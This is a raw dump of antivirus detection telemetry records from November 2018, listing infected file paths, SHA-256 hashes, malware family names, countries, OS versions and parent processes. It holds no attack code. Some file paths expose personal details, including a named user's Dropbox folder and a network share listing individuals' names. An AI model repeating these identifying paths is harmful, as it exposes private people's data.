  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsn7A7E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T18:33:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='swsytbob.exe', filepath='c:\\users\\X\\appdata\\roaming\\swsytbob.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:14:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='inputpersonalization.exe', filepath='\\?\\F:\\INPUTPERSONALIZATION.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='f8650d3e86d707a4c89db8dd1d91b24365680ff757bd20413b912cac83df04d8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175554-e608c8c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175554-E608C8C7', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:52:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:34:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175605-e751aa2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175605-E751AA2D', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='C:\\Program Files\\Microsoft Games\\Minesweeper\\MineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='f13a2faf01545a5f5b772ae52ecee319ed32dfec7420a5f11a91b7f456cb881d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Zl9wHkgFVUmnkhbA.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.vir', filepath='\\\\?\\C:\\Windows\\AutoKMS\\AutoKMS.VIR', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='saveas.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\@B35A.tmp\\SaveAs.exe', filesize=932000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='c49857a85561ebeaf75ddb024177293cf224292a275f932fbf2ed674f88b2e9e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T23:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atheros_ar956x_wireless_network_adapter_10.0.0.313_win7_amd64.exe', filepath='\\\\?\\G:\\DRIVE RESTOR\\WIND7-64+\\Atheros_AR956x_Wireless_Network_Adapter_10.0.0.313_win7_amd64.exe', filesize=2048000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='73be95465d13bff9c1a2cf0a9dd51838f688ddb46e6e1547c7d9a1ba645cf2f7', metadata=Row(cmdline=None, country='BH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_code_cd_096.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_code_cd_096.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='e6245697bfdce24eef418162687fb2e580ddde4b3937faac1afb8c4116de71a3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:35:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsq966F.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T08:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110828-cbd5e3f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110828-CBD5E3F4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8ABB9D1535B61747BBF37018E21EC4F1EC564914211266E82C648C352E934BF5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='97a6edf6b4192f946f474bcb9209823377d92e640854582a9a8061fd4f075ae0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-02T02:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_code_cd_096.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_code_cd_096.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='e6245697bfdce24eef418162687fb2e580ddde4b3937faac1afb8c4116de71a3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T06:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D7B8D7BB76EC3F3F271E272CF71A07C23EE5C036C1373B67C4BAFED4746A1DD', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:05:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='langpack.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2008\\x86\\support\\dotnetfx\\1029\\langpack.exe', filesize=1856000, name='W32/Stanit.#M1.#R1'), hash='ad992d9f3f15a7475cc403f35cbbbb41968f4f6ce965149955a5035d3a90d141', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113711-8a166749', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a5bc4b4\\AVSCAN-20181102-113614-7ED0563A\\AVSCAN-20181102-113711-8A166749', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='914135ca7eecdb63983a04f236977d91161338d8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\914135ca7eecdb63983a04f236977d91161338d8', filesize=192000, name='TR/Crypt.XPACK.e87980.#M1.#R1'), hash='e8798066963ce3a5509ca6f1e940b83983e14fe41726a279e7e868b4d274d344', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='block 1.exe', filepath='F:\\ASANTE PRESBYTERY_LMFDP_Handouts\\BLOCK 1.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235529-56e48c81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_729b0403\\AVSCAN-20181102-235353-4D6B4A88\\AVSCAN-20181102-235529-56E48C81', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:55:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-173408-8dc8299e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3dc913be\\AVSCAN-20181104-173218-7E91D6AB\\AVSCAN-20181104-173408-8DC8299E', filesize=704000, name='DR/Delphi.udure.#M1.#R1'), hash='b3f74a9070d8463e4ae9690c36e2bd34ec2383bf5d56c9e1341bbf861d5628d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029526b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029526b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:58:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290d6a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290d6a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:41:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293668', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293668', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:29:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170111-af7e804d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bd9041\\AVSCAN-20181102-205516-13298918\\AVSCAN-20181104-170111-AF7E804D', filesize=64000, name='Worm/Gamarue.ioemn.#M1.#R1'), hash='ae7c7060def3562a3d78ad8a933c1ce4ecb75263a315be7a9b62d038edb685df', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:57:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='turbo_c_downloader_4209712333.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Turbo_C_Downloader_4209712333.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:43:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e0ca', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e0ca', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl197.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl197.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029086c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029086c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enbhost.exe', filepath='I:\\E\\Program Files\\SK\\Skyrim\\DWENB-零版[Zero]\\enbhost.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='b2b4767f133262bc54121296b5ff7a1437e7af1e142b041f8aa7fb44d7902ade', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\软件\\fastcopy_ha\\FastCopy.exe', parentsize=412672, timestamp='2018-11-04T18:44:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153133-97de9a33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-153133-97DE9A33', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:31:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e4f6d5004eb9e119e76a218abd7eceece5afcd53f211aaa6cd924287a2cc6148', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E4F6D5004EB9E119E76A218ABD7ECEECE5AFCD53F211AAA6CD924287A2CC6148', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e4f6d5004eb9e119e76a218abd7eceece5afcd53f211aaa6cd924287a2cc6148', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:17:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FB35CFFC8D58A245C149D5F9DBC29144A86BA1116CD3730149A53AD860D63CBE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:05:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211001-bbbd4ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181031-211001-BBBD4CA8', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:06Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe297_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe297 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T00:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webapprt-stub.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\mozilla firefox\\webapprt-stub.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='4df0896f082c54030716c989fde1487adfc36b6c72baafa1c766c4fc2ee0773b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='LV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T13:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:23Z'), dt=datetime.date(2018, 11, 2)),
